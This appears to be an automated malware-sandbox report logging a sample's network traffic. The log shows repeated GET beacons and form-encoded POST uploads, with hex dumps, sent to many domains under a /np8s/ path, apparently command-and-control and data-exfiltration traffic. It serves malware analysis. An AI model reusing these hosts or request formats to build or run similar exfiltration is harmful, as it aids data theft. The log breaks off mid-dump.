Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 HTTP/1.1Host: www.pdwfifi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGG9Xc1lZm5PZ&4hM4=o4B0f HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp HTTP/1.1Host: www.muddybootslife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&CTr8g=z48HVPSHfp HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R&CTr8g=z48HVPSHfp HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 160.153.136.3
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflate
44 30 49 61 33 34 79 78 7a 4f 33 75 34 76 54 57 39 52 39 4f 6b 64 33 71 47 66 58 55 74 39 37 2d 53 30 51 57 58 52 38 50 48 6a 45 6b 4c 69 59 62 4d 4b 56 35 69 6c 61 4b 63 56 48 58 49 56 58 58 79 33 53 69 72 33 63 73 57 4c 69 70 70 4e 6e 42 64 69 38 6d 43 31 75 6e 43 49 53 70 54 6c 4f 6e 63 48 48 72 6c 4e 46 63 4c 68 47 51 4b 58 43 67 4f 71 47 63 30 55 4f 72 6d 63 49 65 34 74 56 6e 52 6d 76 59 54 30 66 47 6c 61 77 53 4b 4a 36 67 54 66 34 59 50 48 72 38 7a 71 7a 36 48 44 61 47 41 50 49 65 49 32 68 39 48 4d 44 62 4a 36 4a 31 41 6c 54 32 72 58 57 4f 56 49 72 41 4d 4d 66 48 7e 6d 69 6f 53 6a 36 69 44 4a 51 50 50 36 74 47 79 36 47 58 67 51 7e 2d 57 42 48 45 72 65 30 6b 75 32 4b 6e 4d 44 31 51 47 63 55 69 54 65 78 75 28 49 6a 64 65 56 56 6a 69 58 5a 6c 41 57 61 47 53 42 79 69 4b 4e 6b 33 55 68 72 41 35 73 55 73 7a 66 74 77 47 37 4c 6a 71 41 37 6f 62 4a 6c 44 79 66 46 6d 47 55 4a 75 34 4d 41 33 56 30 39 78 6f 58 6a 6d 33 49 74 47 77 52 59 6a 6f 5a 53 39 34 70 70 46 6d 4a 50 67 7a 61 36 36 59 6e 39 4c 63 70 73 52 64
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 64 37 4f 55 73 31 78 6c 61 46 55 36 51 47 50 31 73 33 44 33 6f 39 35 66 51 5a 58 33 30 42 61 73 6c 52 6c 74 6f 63 45 41 68 31 75 4d 67 6f 45 50 46 55 61 4f 4b 4d 63 6b 6a 4e 79 44 6b 7e 62 44 79 68 4f 66 59 51 73 46 65 52 36 78 57 55 33 43 52 39 57 46 51 68 75 67 6a 48 37 6b 68 36 55 62 74 78 5a 54 32 52 67 4c 51 75 63 59 53 4f 58 4a 35 55 75 46 58 69 6a 28 67 61 63 73 4c 59 4a 4a 49 59 36 4e 55 34 4f 54 74 6c 53 39 35 77 70 36 69 55 67 64 4d 6c 77 4b 46 64 77 79 73 63 50 4c 50 4f 39 38 5f 50 67 70 61 33 56 59 67 57 6d 5a 6c 46 41 6f 4f 78 76 28 6c 6a 4b 36 38 51 4b 6a 5f 54 78 43 66 49 65 61 42 71 6c 66 55 59 56 35 38 54 4b 47 43 30 4d 6f 52 71 49 53 70 72 56 36 46 54 77 42 57 69 44 35 38 42 4f 44 61 43 4d 7e 6c 68 45 6f 63 45 7a 46 66 7a 43 54 63 58 66 6c 4e 4f 71 34 4e 61 74 7a 44 51 48 43 43 73 41 72 44 34 30 49 34 6a 6c 65 56 66 58 79 37 58 53 7a 33 4a 72 74 4e 57 33 57 61 54 39 76 59 69 78 72 48 31 73 4d 44 36 7a 6a 45 56 59 54 51 6c 51 37 63 4b 47 49 6f 67 68 64 67 4b 4d 6b 41 68 4c 6c 51 6c 69 72 34 49 71 7e 30 30 66 4e 41 43 63 71 37 28 42 78 6c 56 4e 43 33 32 49 34 71 6f 55 75 74 44 68 6b 51 36 62 4d 7a 66 78 4c 65 44 46 43 35 67 79 70 42 6c 57 53 4c 44 38 70 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=hbQjEd7OUs1xlaFU6QGP1s3D3o95fQZX30BaslRltocEAh1uMgoEPFUaOKMckjNyDk~bDyhOfYQsFeR6xWU3CR9WFQhugjH7kh6UbtxZT2RgLQucYSOXJ5UuFXij(gacsLYJJIY6NU4OTtlS95wp6iUgdMlwKFdwyscPLPO98_Pgpa3VYgWmZlFAoOxv(ljK68QKj_TxCfIeaBqlfUYV58TKGC0MoRqISprV6FTwBWiD58BODaCM~lhEocEzFfzCTcXflNOq4NatzDQHCCsArD40I4jleVfXy7XSz3JrtNW3WaT9vYixrH1sMD6zjEVYTQlQ7cKGIoghdgKMkAhLlQlir4Iq~00fNACcq7(BxlVNC32I4qoUutDhkQ6bMzfxLeDFC5gypBlWSLD8pw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 59 54 69 62 5f 78 73 37 61 4a 6e 33 46 53 62 36 38 6e 37 31 59 34 6f 54 79 74 55 6d 32 70 4f 69 46 67 56 73 70 6b 6b 48 53 42 50 49 6e 6c 52 50 42 5a 2d 4b 5f 6b 59 33 54 42 7a 44 6b 33 36 44 79 6c 4f 65 59 49 61 46 2d 68 45 79 31 73 30 45 78 39 6d 45 51 68 4e 6b 6e 48 47 6b 68 75 36 62 74 35 7a 54 6d 64 67 4e 7a 47 63 4d 68 6d 63 55 4a 55 6b 5a 48 79 5f 69 77 47 72 73 4c 51 72 4a 49 6b 36 4f 6b 30 4f 56 4e 31 64 32 61 59 6d 39 79 55 68 58 73 6c 70 54 56 67 4a 79 73 49 74 4c 4f 79 39 39 4e 62 67 34 61 58 56 61 52 57 6e 57 31 46 5a 73 4f 78 75 37 6c 28 62 36 38 4d 4f 6a 37 71 47 43 4f 38 65 49 68 71 67 59 47 35 71 71 37 48 5a 45 43 42 63 6f 52 6d 74 63 64 79 54 36 42 43 72 58 54 76 37 37 65 70 77 44 59 75 6d 79 6c 68 41 39 73 46 6e 46 66 79 5f 54 63 58 68 6c 4e 65 71 34 4c 61 74 7a 58 38 48 45 48 34 42 30 6a 34 78 4d 34 6a 33 61 56 6a 76 79 36 28 6f 7a 32 6c 37 71 36 6d 33 58 50 37 39 6e 62 4b 79 77 48 30 70 42 6a 36 52 7e 30 55 50 54 51 6c 32 37 64 4b 6f 49 2d 6b 68 50 46 6d 4d 6a 6d 56 4c 70 41 6c 69 6b 59 49 73 72 45 34 50 4e 41 61 59 71 37 50 72 78 57 35 4e 42 6c 7e 49 37 4c 6f 55 39 4e 44 68 6f 77 37 5a 66 6a 7a 31 4f 38 37 44 42 5a 56 4e 30 67 30 41 55 34 4f 79 35 6d 30 67 71 48 30 47 4b 57 50 51 37 77 6f 37 4f 4b 45 62 79 49 28 36 4e 41 4e 6d 6d 57 68 41 71 49 37 56 55 47 76 78 4a 6d 76 55 54 58 39 42 72 79 63 47 56 39 34 65 37 6c 45 44 49 69 37 5a 64 44 76 59 43 41 52 39 39 4f 4f 2d 61 75 7e 47 6b 68 63 77 5a 32 6e 5a 57 34 43 32 52 78 41 44 68 65 4e 66 38 31 76 70 69 61 52 78 52 42 53 72 58 6c 66 68 
73 6e 39 53 47 37 32 74 51 35 33 36 6b 50 6b 68 36 6b 73 59 7a 2d 30 48 43 45 55 4c 63 52 48 6f 7a 6a 58 63 4d 45 6f 75 70 36 48 4d 72 44 71 59 6c 4e 49 6c 51 38 63 43 6d 32 51 44 4b 52 47 66 74 6e 62 63 6e 4b 32 55 67 6a 47 70 4e 33 4d 37 6d 42 38 4f 77 53 64 7a 30 69 46 73 4a 70 70 6f 64 45 47 4a 6a 69 36 4a 64 43 4e 6e 70 7a 71 69 62 66 4f 4f 53 67 69 33 56 54 68 37 6f 76 4e 4b 68 5f 73 42 66 34 33 6e 4e 4d 35 34 4b 38 75 66 61 44 41 6d 73 64 62 62 31 57 36 54 53 67 6f 4d 71 75 64 66 28 77 59 2d 6a 72 48 65 4b 33 6a 6c 57 6e 65 39 74 2d 45 77 30 58 66 53 74 4b 61 70 6c 34 4b 6b 4d 59 76 69 43 5f 7e 75 72 45 64 48 63 71 56 44 6b 4b 4f 56 4f 6d 42 41 54 47 4c 37 59 30 35 68 61 77 5a 55 32 74 61 38 6d 4f 50 58 4f 58 47 64 67 33 46 4e 49 51 46 65 30 2d 5a 45 6b 74 6e 57 65 45 30 78 6a 31 78 76 39 39 56 6d 4d 76 55 6c 71 6b 56 6f 63 6f 4b 43 6d 58 78 67 44 59 4d 34 62 73 4a 44 4c 51 37 55 30 6a 4d 6d 61 6b 6c 6e 74 6e 32 78 33 4c 79 7a 45 44 64 4b 4a 35 69 57 49 39 57 6a 44 46 6f 64 4e 4f 61 58 32 43 31 64 77
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.brawlhallacodestore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brawlhallacodestore.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 64 68 78 6f 49 54 6a 33 67 6d 68 49 79 5a 4c 45 71 4b 6b 50 56 61 65 6f 58 59 48 59 4d 6c 74 7a 67 66 43 76 6d 4e 74 68 53 42 54 78 62 4a 4f 61 63 6e 74 51 62 67 4d 70 6a 75 62 61 7a 65 43 72 38 34 34 6c 55 54 49 50 58 51 32 7a 45 32 4f 4a 6a 30 6d 2d 48 63 53 52 6d 33 52 6f 72 66 71 79 56 7a 42 49 31 6a 68 4a 6e 56 50 6c 4c 36 64 33 4b 34 53 4f 30 74 74 32 77 58 54 6c 46 62 4c 62 42 36 46 71 51 51 6b 46 6a 6d 4b 49 58 64 39 37 51 63 57 4a 73 7a 7e 75 73 47 61 31 6f 66 45 44 53 58 7e 79 4b 42 28 5a 61 78 63 58 55 74 44 72 44 6d 52 5a 57 58 73 71 73 36 32 69 6e 57 74 5f 32 49 7e 59 4e 59 28 70 4a 76 7a 4f 5a 52 70 33 34 78 49 30 73 50 7e 57 6d 76 34 71 62 70 51 4f 38 49 4a 48 4a 75 63 30 42 73 6e 4a 71 39 33 55 78 45 4a 39 38 58 4e 73 31 4e 36 72 46 47 66 6e 61 61 6e 35 48 61 6e 2d 78 6f 43 6e 41 65 36 71 6d 33 38 4d 34 57 4c 38 33 35 33 65 78 4d 4f 4a 78 38 62 6e 64 61 68 4f 39 43 63 68 4d 75 59 6f 6e 49 4d 36 32 2d 59 68 45 66 6b 55 37 77 79 6e 43 62 4c 73 57 71 68 6c 6f 73 31 6d 4f 31 57 30 30 39 4c 55 4e 36 68 6c 41 34 59 4c 4d 30 67 4b 37 38 70 30 70 4c 68 32 56 63 6d 44 69 38 76 68 42 74 49 62 49 71 7a 6c 53 77 72 58 54 38 77 61 58 65 62 66 53 50 31 79 6b 57 4b 4f 51 2d 28 75 62 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=dhxoITj3gmhIyZLEqKkPVaeoXYHYMltzgfCvmNthSBTxbJOacntQbgMpjubazeCr844lUTIPXQ2zE2OJj0m-HcSRm3RorfqyVzBI1jhJnVPlL6d3K4SO0tt2wXTlFbLbB6FqQQkFjmKIXd97QcWJsz~usGa1ofEDSX~yKB(ZaxcXUtDrDmRZWXsqs62inWt_2I~YNY(pJvzOZRp34xI0sP~Wmv4qbpQO8IJHJuc0BsnJq93UxEJ98XNs1N6rFGfnaan5Han-xoCnAe6qm38M4WL8353exMOJx8bndahO9CchMuYonIM62-YhEfkU7wynCbLsWqhlos1mO1W009LUN6hlA4YLM0gK78p0pLh2VcmDi8vhBtIbIqzlSwrXT8waXebfSP1ykWKOQ-(ubQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.brawlhallacodestore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brawlhallacodestore.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 64 68 78 6f 49 52 47 73 39 46 6c 6a 38 73 54 33 72 63 78 47 65 4c 75 71 52 6f 44 64 4a 68 6c 61 6b 74 32 37 69 50 30 5a 54 45 58 76 66 35 37 36 4b 51 42 49 62 68 52 69 37 4e 76 67 30 2d 4f 6f 38 34 67 66 55 54 38 50 55 54 32 6a 45 52 4b 6e 69 58 4f 78 46 38 54 30 6e 33 51 75 39 61 79 50 56 7a 4d 64 31 67 42 5a 79 31 62 6c 4b 5a 31 33 62 62 4b 4a 36 74 74 34 34 33 43 38 4b 37 47 78 42 37 74 69 51 52 59 46 6a 57 4f 49 58 39 74 6b 45 72 43 4b 68 44 7e 72 70 47 61 73 6d 4f 35 77 53 58 7a 56 4b 42 7a 5a 61 43 6f 58 53 2d 37 72 46 58 52 61 43 58 73 76 6d 61 33 67 77 47 67 6a 32 49 69 71 4e 61 54 66 49 66 33 4f 49 78 70 79 70 53 5a 42 28 49 66 55 6b 72 35 43 62 70 63 6a 38 5a 55 59 4a 76 77 55 47 62 65 68 6f 62 6a 36 78 47 6c 62 77 58 4d 6c 36 74 37 70 46 47 66 68 61 61 6e 48 48 62 58 2d 78 76 32 6e 47 61 61 71 76 52 49 50 6e 57 4c 35 68 4a 32 44 31 4d 4c 6f 78 38 43 70 64 65 34 56 38 78 6f 68 57 62 38 6f 32 4e 67 35 7e 75 59 6a 46 66 6b 63 6b 41 79 6f 43 62 4c 46 57 76 4e 31 76 62 39 6d 63 33 7e 30 7a 65 6a 55 50 4b 68 6c 65 6f 59 4a 43 6b 74 58 37 38 78 77 70 4c 51 44 56 72 7e 44 69 76 33 68 42 49 6b 62 4a 36 7a 6c 48 41 71 46 64 34 70 49 62 75 48 42 52 2d 6c 32 38 45 6a 67 47 4b 32 37 4f 46 67 46 7e 59 72 5a 34 66 64 45 49 4b 4d 55 43 51 30 64 6f 30 39 78 6d 56 79 31 64 4f 6e 6d 68 4c 7e 4f 74 4e 4e 6f 28 59 6c 34 4c 50 4e 4c 55 50 31 6f 6f 4c 54 33 4b 7a 6c 36 41 53 45 68 49 72 69 37 6c 59 44 5a 6a 73 45 67 75 4e 57 30 5a 49 69 47 48 69 76 58 59 59 6f 4a 31 65 47 70 30 52 39 77 45 4d 42 38 49 52 6f 31 56 37 
4f 56 47 51 30 34 65 30 69 5a 34 36 37 67 28 77 37 55 4f 53 33 30 56 59 57 6d 35 6e 4f 6f 78 36 47 44 64 5f 75 55 74 78 65 54 48 31 42 39 53 6b 70 50 41 79 5a 36 38 5a 55 77 37 61 4b 56 44 56 75 5f 4b 58 58 46 67 48 47 6c 79 78 68 49 54 54 4e 48 42 73 7e 64 36 76 6e 44 36 43 63 51 6c 52 4b 73 73 35 58 42 47 68 4d 4d 42 4a 61 67 79 71 32 74 6a 65 58 4b 70 47 56 51 32 43 47 38 42 56 46 79 42 55 58 54 7e 51 6a 43 61 33 4e 45 76 61 42 44 43 73 33 4c 30 4f 62 4f 71 76 6d 4d 61 58 39 52 73 7a 4d 5a 33 6a 30 37 59 39 57 77 28 75 63 45 4a 6f 6d 38 52 6d 6e 36 73 36 37 4d 70 56 7e 63 72 68 48 57 69 73 31 54 7a 35 76 59 32 53 69 41 6e 72 50 51 4e 64 43 46 76 72 6d 6f 6b 50 31 58 6c 36 53 5f 5a 74 38 31 55 68 6c 63 4d 59 4c 4f 54 49 52 67 7e 67 52 78 74 66 79 77 6c 4f 61 7a 39 77 41 71 41 6e 4e 4a 6a 74 39 61 48 77 72 6c 64 72 4c 4a 42 41 4a 47 49 79 67 45 59 68 28 34 67 5a 36 4b 52 65 34 48 6a 31 46 30 75 42 6c 46 6a 78 52 4b 73 41 47 4b 71 34 68 34 33 36 77 42 72 35 55 57 46 61 46 4c 79 69 67 42 6f 68 6f 47 71 70 49
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.pdwfifi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.pdwfifi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pdwfifi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 7e 4a 4c 69 37 73 45 78 62 34 72 33 6b 39 4b 7a 77 46 68 38 79 39 56 43 56 59 4b 36 62 59 78 75 49 56 34 78 33 6d 65 4a 48 6b 6d 35 36 46 43 5a 70 53 53 68 69 76 43 6a 4a 5f 76 2d 75 79 50 6e 44 75 33 45 35 6a 78 6c 52 61 6d 35 69 49 62 4a 6e 4b 7a 63 55 52 73 58 6f 73 37 61 46 63 69 51 52 4e 4c 68 6f 42 43 59 44 34 74 67 36 53 76 6c 4b 44 74 5a 77 2d 4f 45 77 4f 34 32 76 41 76 43 49 2d 64 67 49 6c 64 66 79 6e 75 4d 50 68 66 62 39 31 68 56 46 37 54 61 58 78 54 39 64 6b 6d 42 4c 63 28 71 65 36 31 46 36 4e 6c 71 72 6a 34 77 30 58 43 4e 66 71 6b 4c 73 4b 41 64 75 59 44 37 7e 38 6f 7a 45 37 71 65 51 67 57 32 44 4c 4b 52 77 43 4e 75 33 34 6a 2d 41 5f 49 56 72 4c 78 37 46 52 28 46 31 78 62 6e 53 68 69 44 6f 67 67 78 67 79 72 45 35 33 4e 76 30 63 47 53 77 78 4e 30 38 41 36 57 70 54 50 70 52 2d 55 51 49 39 5a 4d 43 4e 4b 55 41 63 68 58 6f 69 39 78 34 4a 64 70 55 6d 6c 67 57 36 36 36 44 66 4d 41 62 67 67 44 71 74 75 6b 48 65 49 78 56 37 46 4c 61 4c 47 4a 58 39 41 4a 5a 37 50 34 5a 2d 35 47 74 4c 50 59 7a 41 74 56 51 4f 75 54 51 33 31 55 78 73 77 73 6c 6b 6f 33 57 69 6c 39 4f 36 7a 6f 59 41 33 49 46 4d 4b 51 32 48 49 54 58 37 44 78 61 34 70 36 57 41 4c 72 62 45 39 72 64 75 68 4f 70 4b 4c 56 4c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=~JLi7sExb4r3k9KzwFh8y9VCVYK6bYxuIV4x3meJHkm56FCZpSShivCjJ_v-uyPnDu3E5jxlRam5iIbJnKzcURsXos7aFciQRNLhoBCYD4tg6SvlKDtZw-OEwO42vAvCI-dgIldfynuMPhfb91hVF7TaXxT9dkmBLc(qe61F6Nlqrj4w0XCNfqkLsKAduYD7~8ozE7qeQgW2DLKRwCNu34j-A_IVrLx7FR(F1xbnShiDoggxgyrE53Nv0cGSwxN08A6WpTPpR-UQI9ZMCNKUAchXoi9x4JdpUmlgW666DfMAbggDqtukHeIxV7FLaLGJX9AJZ7P4Z-5GtLPYzAtVQOuTQ31Uxswslko3Wil9O6zoYA3IFMKQ2HITX7Dxa4p6WALrbE9rduhOpKLVLQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.pdwfifi.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.pdwfifi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pdwfifi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 7e 4a 4c 69 37 70 38 64 43 4c 7e 78 67 64 48 54 39 53 78 6f 71 59 64 41 61 4a 7e 5f 47 70 63 77 66 33 41 62 71 58 4f 65 45 6c 65 76 72 46 32 34 69 78 69 35 69 71 7e 4f 64 63 4c 69 71 53 54 67 44 75 76 75 35 6a 39 6c 57 71 50 6e 69 70 4c 6a 6b 6f 72 64 51 78 73 6e 70 73 37 48 54 74 4f 39 52 4e 66 48 6f 42 62 41 44 4c 70 67 37 30 72 6c 62 55 35 65 30 65 4f 4f 39 75 4a 76 72 41 7a 66 49 2d 46 47 49 6b 68 66 79 58 79 4d 4f 43 48 61 31 55 68 61 43 72 54 66 53 78 54 6f 55 45 71 5f 4c 63 79 5f 65 37 6c 46 37 34 39 71 71 33 49 77 79 6c 71 4f 55 36 6b 43 6f 4b 41 41 71 64 61 6e 7e 38 30 4a 45 2d 47 6b 51 31 57 32 41 62 4b 51 36 78 73 64 77 76 33 70 47 5f 4d 69 72 4c 39 43 47 43 37 64 31 30 72 62 46 41 53 34 30 53 59 62 67 77 48 36 36 58 4e 72 67 4d 47 43 77 78 4e 41 38 41 37 46 70 53 28 70 52 38 30 51 4a 73 70 4d 4c 72 65 58 49 4d 68 57 6c 43 38 73 38 4a 52 73 55 6d 38 46 57 34 75 71 44 4e 49 41 62 30 38 44 73 50 32 6c 65 65 49 7a 57 37 46 6c 48 62 47 4d 58 39 41 72 5a 5f 61 6c 5a 4a 68 47 74 61 50 59 30 6c 78 56 53 65 75 54 65 58 31 57 37 4d 30 38 6c 6b 78 38 57 67 39 74 4f 74 44 6f 66 53 28 49 45 74 4b 51 79 33 49 54 44 4c 44 76 64 74 45 44 63 42 6a 61 4d 32 63 67 43 71 45 6d 69 61 4b 66 52 46 76 4c 34 59 63 63 6e 43 77 64 70 64 42 50 30 58 45 74 6b 75 58 56 6e 31 34 77 6f 71 7a 30 4f 56 70 39 76 69 59 55 6f 43 45 35 65 2d 57 5a 72 63 6c 4d 33 7a 75 4c 66 30 41 6d 32 39 52 5a 36 37 75 50 43 43 65 32 70 63 4d 38 58 69 73 5a 6d 32 72 43 42 38 42 51 38 31 6a 4e 37 70 68 43 58 35 35 33 50 6a 34 55 4a 4e 6e 50 37 47 4d 78 69 63 64 32 4f 67 76 39 32 68 
4a 5a 7a 77 74 6d 42 4a 66 7a 59 4f 30 30 79 51 64 6a 70 36 28 42 47 31 30 6b 50 7a 61 65 76 48 77 52 70 5f 77 77 6a 2d 41 32 6f 34 47 72 33 39 38 74 68 36 50 2d 7a 42 44 2d 37 4f 70 79 34 7a 34 43 78 34 68 48 53 44 76 74 4f 54 6a 54 35 48 47 36 37 49 28 39 38 32 6d 78 33 37 72 6d 6b 67 36 6c 37 4a 78 75 7a 41 6d 31 4a 79 71 71 61 78 71 34 32 43 5a 6e 39 4e 6d 37 4a 7a 51 41 62 62 43 79 69 33 6d 77 28 31 6b 45 69 36 52 4e 52 6c 77 6d 5a 33 73 51 34 34 67 71 65 46 58 67 64 79 39 7a 55 71 41 56 49 64 6e 4e 39 55 47 5f 65 31 59 6d 50 55 68 53 77 48 44 64 47 47 39 6a 6f 64 65 4a 4b 6e 6c 38 71 74 44 6f 58 47 71 74 30 58 49 77 39 54 59 6e 65 49 32 75 61 61 6a 79 68 57 68 71 33 69 4a 33 32 49 33 6b 6d 58 46 52 51 52 46 65 71 67 46 69 58 35 56 64 37 73 43 30 6a 38 42 4a 63 54 6e 36 4c 77 28 54 6a 4f 35 51 57 78 5a 75 4b 57 56 32 64 6c 32 51 7a 41 7e 63 34 45 31 68 38 55 72 47 54 73 33 6c 54 76 42 31 53 4e 6f 54 6a 55 54 47 74 45 4f 77 63 76 44 70 66 30 36 47 50 52 64 63 63 35 4e 34 4c 66 57 65 35 32 35 51 63 54 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.68chengxinle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.68chengxinle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.68chengxinle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 37 64 39 33 45 51 68 55 78 32 6d 4c 57 63 39 4b 5a 76 50 4b 4a 74 43 64 36 43 65 71 4d 54 35 6e 62 65 53 4d 4d 6d 7e 36 61 30 77 30 34 6f 37 71 4a 55 75 32 43 72 4f 2d 62 6c 39 52 57 47 56 76 78 4e 58 64 4e 78 7e 72 79 48 56 73 77 42 68 5a 52 76 42 53 45 4a 30 4c 6a 6c 45 53 6d 4c 67 5a 49 54 78 66 73 76 49 76 59 4c 4c 73 39 4e 35 4a 45 78 5a 69 58 6f 70 4b 6b 76 7a 4a 42 37 32 5a 59 66 7a 63 4b 39 66 39 74 31 38 75 4a 58 68 68 57 7a 79 44 42 4b 7e 42 57 49 6e 79 68 6f 73 36 49 52 56 34 75 34 43 63 36 45 58 48 6b 45 4b 54 50 45 31 67 51 33 4d 72 6f 41 50 37 6d 49 41 6e 44 79 38 77 46 35 6d 56 36 79 53 31 7a 67 4a 4e 30 63 42 67 54 38 31 4d 30 34 6f 42 39 62 38 50 53 7a 73 71 41 47 48 66 46 49 41 6c 4d 63 7a 4c 4b 36 33 70 30 69 61 6f 61 67 46 7a 31 